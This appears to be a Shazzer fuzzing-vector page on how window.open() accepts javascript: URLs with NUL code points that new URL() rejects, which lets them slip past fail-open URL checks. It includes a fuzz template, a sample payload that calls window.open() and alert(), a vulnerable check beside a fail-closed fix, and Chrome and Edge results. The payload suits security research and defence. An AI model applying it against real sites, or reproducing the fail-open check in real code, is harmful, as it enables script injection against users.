
URL parsing difference between window.open() and new URL()


This vector tries to bypass a URL check implemented like the one below, where a parse failure in new URL() is treated as harmless and the raw string is handed straight to window.open():

try {
    parsedUrl = new URL(url)
    // do some checks on protocol, host
} catch(e) {
    // fine, we can use it: simply
    window.open(url)
}

Created by: Sudistark

Created on: Friday, February 21, 2025 at 8:47:03 AM

Updated on: Wednesday, May 28, 2025 at 11:16:41 AM


Category: URL Handling

Vector visibility: Public

Vector type: JS

Vector charset: UTF-8

Template used:

// $[i] and $[j] are the two code points Shazzer substitutes on each run
char = String.fromCodePoint($[i],$[j])
url = "javascript://"+char+"google.com"

try {
    new URL(url)
}
catch(e){
    // new URL() rejected the string; see whether window.open() still accepts it
    pwn(url,char)
}

function pwn(url,char){
    try{
        window.open(url)
        console.log("shirley");
        log($[i],$[j])
    }catch(e){
    }
}

Sample payloads

char = String.fromCodePoint(0,0)
url = "javascript://"+char+"google.com"

try {
    new URL(url)
}
catch(e){
    pwn(url,char)
}

function pwn(url,char){
    try{
        window.open(url)
        console.log("shirley");
        alert(0,0)
    }catch(e){
    }
}
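The fail-open check this vector targets, beside a fail-closed version, as an added example that is not part of the Shazzer page; the functions only report whether the code would go on to call window.open(), they do not open anything, and the sample inputs are constructed here (the first one reproduces the page's sample payload).

```javascript
// weakCheck mirrors the check described at the top of the page: when the
// URL parser throws, the raw string is passed to window.open() without any
// protocol or host check. Returns true when window.open(url) would be called.
function weakCheck(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return true; // fails open: whatever new URL() rejects is opened as-is
  }
  return parsed.protocol === "https:" || parsed.protocol === "http:";
}

// strictCheck fails closed: a parse failure is a rejection, only an explicit
// protocol allowlist passes, and the caller is handed the serialized href
// (parsed.href) rather than the raw input, so what gets opened is exactly
// what was validated. Returns the href to open, or null when rejected.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

function strictCheck(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return null; // fails closed: unparseable input is never opened
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) return null;
  return parsed.href;
}

// Browser-side wrapper (hypothetical helper): opener defaults to window.open
// so the validated href, not the raw string, is what gets navigated.
function safeOpen(url, opener = (href) => window.open(href)) {
  const href = strictCheck(url);
  if (href === null) return false;
  opener(href);
  return true;
}

// Constructed inputs. SAMPLE_URL is the page's sample payload: two U+0000
// code points between "javascript://" and the host, which the WHATWG URL
// parser rejects (NUL is a forbidden host code point).
const SAMPLE_CHAR = String.fromCodePoint(0, 0);
const SAMPLE_URL = "javascript://" + SAMPLE_CHAR + "google.com";
```

Run against SAMPLE_URL, weakCheck() returns true (the string reaches window.open unchecked) while strictCheck() returns null.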

Fuzz results

Chrome 144.0.0.0 desktop Windows NT 10.0

Updated: Sun Jan 25 2026
Found 1 result
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0

Updated: Fri Jan 30 2026
Found 1 result